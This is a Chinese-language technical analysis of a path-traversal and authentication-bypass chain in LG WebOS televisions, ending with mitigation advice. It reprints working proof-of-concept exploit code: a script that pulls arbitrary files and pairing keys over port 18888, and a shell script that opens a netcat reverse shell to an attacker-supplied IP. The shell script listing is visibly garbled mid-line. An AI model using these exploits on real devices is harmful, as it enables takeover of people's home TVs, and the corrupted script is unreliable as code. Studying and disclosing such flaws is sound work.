1. 簡介

本報告針對 LG WebOS 電視系統近期揭露的漏洞,提供全面性的技術分析。本報告的重點是理解這些安全缺陷的底層機制,特別是兩個漏洞:一個是 Path traversal,另一個是身分驗證繞過,兩者結合可導致裝置完全被接管。本分析深入探討了入侵過程的技術細節,檢視了所涉及的元件,並闡明這些漏洞如何被串聯攻擊,以危及受影響裝置的完整性和控制權。本報告還包含了對所提供的概念驗證(PoC)程式碼的檢視,以闡明這些漏洞利用的實際層面。這項研究旨在對智慧裝置安全,以及嵌入式系統中強健的輸入驗證和身分驗證機制的重要性,做出更深入的貢獻。

資安警訊:LG WebOS 漏洞風險全面解析,保護你的智慧電視與居家安全 | 資訊安全新聞

2. 漏洞細節

2.1 Path Traversal 漏洞

LG WebOS 電視系統中發現的主要漏洞是一個Path traversal缺陷。當 USB 儲存裝置連接後,此漏洞會在 browser-service 元件中出現,該元件會開啟 port 18888。這個 port 可透過 /getFile?path=… API 端點,從特定的目錄(即 /tmp/usb /tmp/home.office.documentviewer )下載檔案 [1]。

關鍵的缺陷在於應用程式未能充分驗證 API 請求中提供的 path 參數。這種驗證不足使得攻擊者可以操控path,以存取預期目錄之外的任意檔案。透過注入目錄遍歷序列(例如 ../ ),攻擊者無需任何事先的身分驗證,即可瀏覽檔案系統並從裝置上的任何位置下載敏感檔案。這種未經身分驗證的檔案下載能力,構成了後續攻擊的基礎步驟。

2.2 secondscreen.gateway 服務中的身分驗證繞過

Path traversal漏洞的基礎上,攻擊者可以利用這個缺陷來實現 secondscreen.gateway 服務的身分驗證繞過。 secondscreen.gateway 服務負責管理與對等裝置的連接和互動。這些對等客戶端的認證keys儲存在位於 /var/db/main/ 的資料庫檔案中 [1]。

藉由利用Path traversal漏洞,攻擊者可以下載這個包含認證keys的資料庫檔案。一旦取得這些keys,它們就可以被用來冒充合法的對等裝置,從而繞過 secondscreen.gateway 服務的身分驗證機制。這種繞過授予了對該服務的未經授權存取,而該服務是裝置管理和控制的關鍵元件。

2.3 裝置完全被接管

Path traversal和身分驗證繞過漏洞的結合,最終導致裝置完全被接管的可能性。在未經授權的情況下存取 secondscreen 服務後,攻擊者獲得了執行高權限操作的能力。這些操作包括但不限於啟用開發人員模式、安裝 malicious payload,以及最終取得受影響的 LG WebOS 電視裝置的完整控制權 [1]。安裝任意應用程式的能力意味著攻擊者可以執行具有更高權限的程式碼,有效地將智慧電視變成一個被入侵的平台,進行進一步的惡意攻擊。

3. 入侵技術分析

入侵過程涉及多個階段,從初始的偵察到實現持續性的控制。所提供的概念驗證 (PoC) 程式碼展示了一個複雜的攻擊鏈,利用了所識別的漏洞。本節將剖析用於入侵的 Dockerfile、shell scripts和Python scripts的技術層面。

3.1 Dockerfile 分析

Dockerfile 用於建立一個受控的攻擊環境。它設定了一個 Python 3.8 環境並安裝了必要的dependencies,包括 nginx 和來自 requirements.txt 的 Python packages。Dockerfile 還將 exploit code 複製到 image 中,並將 command 設定為 bash ,允許互動式執行攻擊 scripts。

  1. FROM python:3.8
  2. WORKDIR /usr/local/app
  3. RUN apt-get update
  4. RUN apt-get install -y nginx
  5. # Install the application dependencies
  6. COPY ./src /.
  7. COPY ./www /var/www/html/
  8. RUN pip install --no-cache-dir -r ./requirements.txt
  9. CMD ["bash"]

此 Dockerfile 的關鍵方面是:

  • FROM python:3.8 :建立基礎 image,提供一個 Python 環境。
  • WORKDIR /usr/local/app :設定 container 內的工作目錄。
  • RUN apt-get install -y nginx :安裝 Nginx,很可能用於提供 malicious payload或作為攻擊者的 web server。
  • COPY ./src /. COPY ./www /var/www/html/ :這些 command 將 exploit source code 和 web assets 複製到 Docker image 中。 /var/www/html/ 目錄是 web server 內容的標準位置,這表示 Nginx 將被用來託管 exploit 的一部分。
  • RUN pip install --no-cache-dir -r ./requirements.txt :安裝 exploit scripts 所需的 Python dependencies。

3.2 get_root.sh script 分析

get_root.sh script 是建立 Reverse shell 和執行 remote trigger 的關鍵元件。它首先提取一個 remote IP address,然後在目標系統上建立一個 Python script ( remote_trigger.py ),最後執行一個 netcat reverse shell command。

  1. #!/bin/sh
  2. # get_root.sh
  3. remoteip=$1
  4. cat << 'EOF1' > /tmp/remote_trigger.py
  5. import socket
  6. import time
  7. import struct
  8. import sys
  9. import os
  10. import threading
  11. import ctypes
  12. from ctypes.util import find_library
  13. libc = ctypes.CDLL(find_library('c'))
  14. def set_proc_name(name):
  15. libc.prctl(15, ctypes.c_char_p(name), 0, 0, 0)
  16. proc_name = "blah-blah"
  17. if len(sys.argv) > 1:
  18. proc_name = sys.argv[1]
  19. set_proc_name(proc_name.encode("UTF-8"))
  20. x = threading.Thread(target=time.sleep, args=(8600,))
  21. x.start()
  22. with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
  23. s.connect("/tmp/remotelogger")
  24. print("send")
  25. s.sendall(struct.pack('&1|nc $remoteip 23231 >/tmp/f
  26. exit 0
  27. " > /tmp/xdg_e
  28. chmod +x /tmp/xdg_e
  29. python3 /tmp/remote_trigger.py '${XDG_DIR_E}'

此 script 執行以下動作:

  • remoteip=$1 :擷取攻擊者的 IP address 作為argument。
  • cat << 'EOF1' > /tmp/remote_trigger.py :此block將 Python script remote_trigger.py 寫入目標裝置的 /tmp 目錄。這個 script 目的是與本機 socket 互動,可能是為了觸發一個特定的程序或繞過一些本機安全措施。使用 set_proc_name 則表明試圖偽裝該程序。
  • echo "..." > /tmp/xdg_e :此block建立另一個 shell script, xdg_e ,它設定一個 named-pipe ( /tmp/f ),然後使用 netcat 建立一個 Reverse shell 連接到攻擊者的機器 ( $remoteip ) 的 port 23231。這是取得 remote command execution 的標準技術。
  • chmod +x /tmp/xdg_e :使 Reverse shell script 可執行。
  • python3 /tmp/remote_trigger.py '${XDG_DIR_E}' :執行 Python trigger script,可能傳遞一個 environment variable 或 argument 給它。

3.3 remote_trigger.py script 分析

remote_trigger.py script 嵌入在 get_root.sh 中,旨在與本機 UNIX socket 互動。其主要目的似乎是程序操作或觸發一個特定的本機服務。

  1. import socket
  2. import time
  3. import struct
  4. import sys
  5. import os
  6. import threading
  7. import ctypes
  8. from ctypes.util import find_library
  9. libc = ctypes.CDLL(find_library('c'))
  10. def set_proc_name(name):
  11. libc.prctl(15, ctypes.c_char_p(name), 0, 0, 0)
  12. proc_name = "blah-blah"
  13. if len(sys.argv) > 1:
  14. proc_name = sys.argv[1]
  15. set_proc_name(proc_name.encode("UTF-8"))
  16. x = threading.Thread(target=time.sleep, args=(8600,))
  17. x.start()
  18. with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
  19. s.connect("/tmp/remotelogger")
  20. print("send")
  21. s.sendall(struct.pack('<L', x.native_id) + b'A'*0x80)
  22. print("recv")
  23. data = s.recv(4)
  24. print("kill")
  25. os.kill(x.native_id, 0x4)

此 script 的關鍵功能包括:

  • set_proc_name :此功能使用 prctl 來更改程序名稱,這是隱藏 malicious payload 或使其看起來合法的一種常見策略。
  • thread creation:建立一個新 thread,它只是簡單地休眠很長一段時間(8600 秒)。這可能是保持讓程序有效或建立一個誘餌的方式。
  • UNIX socket communication:script 連接到位於 /tmp/remotelogger 的 UNIX domain socket。它傳送資料(一個 packed integer 和一些 bytes),然後接收 4 bytes 的資料。最後,它試圖殺死創建的 thread。如果沒有 WebOS 系統的更多環境,這個 socket communication 的確切目的尚不完全清楚,但它很可能與一個可以被操縱的本機服務或daemon互動。

3.4 rootmytv.py script 分析

rootmytv.py script 是主要的 exploit orchestrator。它結合了Path traversal漏洞來提取敏感資料,並可能使用身分驗證繞過來獲得進一步的控制權。它利用了多個 Python libraries 進行網路通訊、檔案系統互動和資料庫操作。

  1. #!/usr/bin/python3
  2. # rootmytv.py
  3. from bscpyigtv import WebOSClient
  4. from bscpyigtv import endpoints as ep
  5. from aiohttp import web
  6. import asyncio
  7. import socket
  8. import time
  9. import requests
  10. import os
  11. import re
  12. import json
  13. import plyvel
  14. from cursor import LGTVCursor
  15. # import sqlite3
  16. from sqlitedict import SqliteDict
  17. import sys, getopt
  18. class TV_LG:
  19. def __init__(self, ip):
  20. self.ip = ip
  21. self.tvdb_path = "./tvdb"
  22. try:
  23. os.mkdir(self.tvdb_path)
  24. except FileExistsError:
  25. pass
  26. def get_file(self, save_file_path, target_file_path):
  27. url = "http://{}:18888/getFile?path=/tmp/usb/../../..{}".format(
  28. self.ip, target_file_path
  29. )
  30. print(target_file_path)
  31. r = requests.get(url)
  32. if r.status_code == 200:
  33. with open(save_file_path, "bw+") as f:
  34. f.write(r.content)
  35. else:
  36. # pass
  37. print("error code {} : {}".format(r.status_code, r.text))
  38. def get_keys(self):
  39. results = []
  40. if 0:
  41. print("get manifest file")
  42. self.get_file(self.tvdb_path + "/" + "CURRENT", "/var/db/main/CURRENT")
  43. manifest = ""
  44. with open(self.tvdb_path + "/" + "CURRENT", "r") as f:
  45. manifest = f.read().strip("\r\n")
  46. self.get_file(
  47. self.tvdb_path + "/" + manifest, "/var/db/main/{}".format(manifest))
  48. print("get database file")
  49. self.get_file(self.tvdb_path + "/" + "LOG", "/var/db/main/LOG")
  50. self.get_file(self.tvdb_path + "/" + "LOG.old", "/var/db/main/LOG.old")
  51. dbindex = []
  52. with open(self.tvdb_path + "/" + "LOG", "r") as f:
  53. for line in f:
  54. # print(line)
  55. matches = re.findall(r"Generated table #(\\d+)", line)
  56. if len(matches) > 0:
  57. dbindex = dbindex + matches
  58. with open(self.tvdb_path + "/" + "LOG.old", "r") as f:
  59. for line in f:
  60. # print(line)
  61. matches = re.findall(r"Generated table #(\\d+)", line)
  62. if len(matches) > 0:
  63. dbindex = dbindex + matches
  64. print(dbindex)
  65. # db_files = ["/var/db/main/CURRENT", "/var/db/main/MANIFEST-000482", "000501.ldb", "000502.ldb", "000503.ldb", "000504.ldb"]
  66. db_files = ["000505.ldb"]
  67. for i in dbindex:
  68. self.get_file(
  69. self.tvdb_path + "/" + "0" * (6 - len(str(i))) + ".ldb".format(i),
  70. "/var/db/main/" + "0" * (6 - len(str(i))) + "{}.ldb".format(i)
  71. )
  72. ldb_dir = self.tvdb_path
  73. db = plyvel.DB(ldb_dir, create_if_missing=False)
  74. for key, value in db:
  75. key_str = key.decode("utf-8", errors="ignore")
  76. val_str = value.decode("utf-8", errors="ignore")
  77. # print(f"Key(raw): {key}")
  78. # print(f"Value(raw): {value}\n")
  79. if "READ_INSTALLED_APPS" in val_str:
  80. # if True:
  81. key = re.findall(r"\\b[a-fA-F0-9]{32}\\b", val_str)
  82. # print(key)
  83. if key != \'\':
  84. results.append(key[0])
  85. return results
  86. def get_lan_ip():
  87. try:
  88. # Create a socket object
  89. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  90. # Use Google\'s public DNS server to determine the LAN IP
  91. s.connect(("8.8.8.8", 80))
  92. # Get the socket\'s own address
  93. ip = s.getsockname()[0]
  94. # Close the socket
  95. s.close()
  96. print(f"Using {ip} as LAN IP")
  97. return ip
  98. except Exception as e:
  99. print(f"Error: {e}")
  100. return None
  101. STOP_SERVER = False
  102. # HOST_IP = input("Enter your LAN IP address, or press ENTER to autodetect: ") or get_lan_ip()
  103. HOST_IP = "192.168.1.188"
  104. TV_IP = "192.168.1.56"
  105. try:
  106. opts, args = getopt.getopt(sys.argv[1:], "ht:r:", ["target=", "remoteip="])
  107. except getopt.GetoptError:
  108. print("exploit -t <target> -r <remoteip>")
  109. sys.exit(2)
  110. for opt, arg in opts:
  111. if opt == '-h':
  112. print("exploit -t <target> -r <remoteip>")
  113. sys.exit()
  114. elif opt in ("-t", "--targetip"):
  115. TV_IP = arg
  116. elif opt in ("-r", "--remoteip"):
  117. HOST_IP = arg
  118. def check_telnet():
  119. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  120. sock.settimeout(1) # Timeout period in seconds
  121. end_time = time.time() + 15
  122. while time.time() < end_time:
  123. try:
  124. if sock.connect_ex((TV_IP, 23)) == 0:
  125. return True
  126. except socket.error:
  127. pass
  128. time.sleep(1) # Wait for 1 second before checking again
  129. return False
  130. async def handle_request():
  131. print("Served 404 response")
  132. return web.Response(text="OK")
  133. FILE_DIR = "./www"
  134. async def handle_download(request):
  135. filename = request.match_info.get("filename")
  136. file_path = os.path.join(FILE_DIR, filename)
  137. print(filename)
  138. if not os.path.isfile(file_path):
  139. return web.Response(text="File not found", status=404)
  140. return web.FileResponse(path=file_path)
  141. async def main():
  142. tv = TV_LG(TV_IP)
  143. keys = tv.get_keys()
  144. db = SqliteDict("aiopyigtv.sqlite", "unnamed")
  145. for key in keys:
  146. print(f"found key: {key}")
  147. db[key] = ""
  148. db.commit()
  149. # if check_telnet():
  150. # print("Telnet is open, exiting")
  151. # sys.exit(0)
  152. # app = web.Application()
  153. # app.router.add_get("/{filename}", handle_download)
  154. # app.router.add_get("/", handle_request)
  155. # runner = web.AppRunner(app)
  156. # await runner.setup()
  157. # site = web.TCPSite(runner, HOST_IP, 80)
  158. # await site.start()
  159. # print(f"Serving on http://{HOST_IP}:80")
  160. # while not STOP_SERVER:
  161. # await asyncio.sleep(1)
  162. if __name__ == "__main__":
  163. asyncio.run(main())

TV_LG class 封裝了與有漏洞的電視互動的核心邏輯。關鍵methods包括:

  • __init__(self, ip) :使用目標電視的 IP address 初始化 class,並建立一個本機目錄 ( ./tvdb ) 來儲存下載的資料庫檔案。
  • get_file(self, save_file_path, target_file_path) :這是最關鍵的method,直接利用Path traversal漏洞。它使用電視的 IP 和 port 18888 建立 URL,並在後面加上Path traversal序列 /tmp/usb/../../.. ,然後是 target_file_path 。這使其能夠請求電視檔案系統上的任何檔案。下載的內容隨後會儲存在本機。
  • get_keys(self) :這個method協調認證keys的擷取。它試圖使用 get_file method 從 /var/db/main/ 下載各種資料庫檔案 ( LOG , LOG.old ,以及可能的 .ldb 檔案)。然後它解析這些檔案,特別尋找像 "READ_INSTALLED_APPS" 和代表認證keys的十六進位字串等pattern。它使用 plyvel.DB 來與 LevelDB 資料庫互動,這些資料庫通常用於儲存key-value pairs。提取的keys隨後被回傳。

rootmytv.py 的主要執行 block 會解析 command-line arguments,以取得目標電視的 IP 和攻擊者(remote)的 IP。然後它初始化 TV_LG class,呼叫 get_keys() 來擷取認證keys,並將它們儲存在 SqliteDict 資料庫中。被註解掉的部分則表明了後續步驟,例如建立 web server 以提供 malicious payload 或檢查 Telnet 存取,這些都將是裝置完全被接管的一部分。

3.5 漏洞鏈示意圖

以下示意圖說明了從初始存取到裝置完全被接管的攻擊鏈:

graph TD A[Attacker] --> B{USB Device
Connected to TV} B --> C{Browser Service
on Port 18888} C --> D[getFile?path=...
API Endpoint] D -- Path Traversal --> E[Access
/var/db/main/
Database] E --> F[Download
Authentication Keys] F -- Authentication
Bypass --> G[secondscreen.gateway
Service Access] G --> H{Enable
Developer Mode} G --> I{Install
Malicious
Applications} G --> J[Full Device
Takeover]

4. 緩解與預防

為了預防此類漏洞,有幾個安全措施至關重要:

  • 輸入驗證: 對所有使用者提供的輸入,特別是path parameters,進行嚴格的驗證是防止Path traversal攻擊的關鍵。這包括清理輸入並確保檔案存取僅限於預期的目錄。
  • 身分驗證與授權: 所有敏感服務都應建立強健的身分驗證機制。特別是 secondscreen.gateway 服務,即使keys被入侵,也需要強大的身分驗證來防止未經授權的存取。可以實施多因素身分驗證或更安全的key管理實踐。
  • 最小權限原則: 服務應以所需的最低權限來運行。browser service 不應存取其指定範圍之外的關鍵系統檔案或目錄。
  • 安全開發生命週期: 在整個軟體開發生命週期 (SDLC) 中實施安全措施,有助於及早識別和修復漏洞。這包括威脅建模、安全測試和程式碼審查。
  • 定期更新與修補: 廠商必須及時提供已識別漏洞的安全更新和修補。應鼓勵使用者及時應用這些更新。
  • 網路分割: 將智慧電視隔離在一個單獨的網路segment上,可以限制入侵的影響,防止攻擊者輕易地轉移到家用網路上的其他裝置。

5. 結論

在 LG WebOS 電視系統中發現的漏洞,凸顯了保護物聯網和智慧裝置的持續挑戰。Path traversal缺陷和身分驗證繞過的結合,創造了一個關鍵的攻擊向量,可能導致對受影響裝置的完全控制。對 exploit chain 的技術分析,包括 Docker 設定、shell scripts和Python code,展示了這些漏洞被利用的複雜程度。有效的緩解策略包括嚴格的輸入驗證、強大的身分驗證、遵守最小權限原則以及全面的安全開發生命週期。隨著智慧裝置變得越來越普及,持續的警惕和主動的安全措施對於保護使用者隱私和裝置完整性至關重要。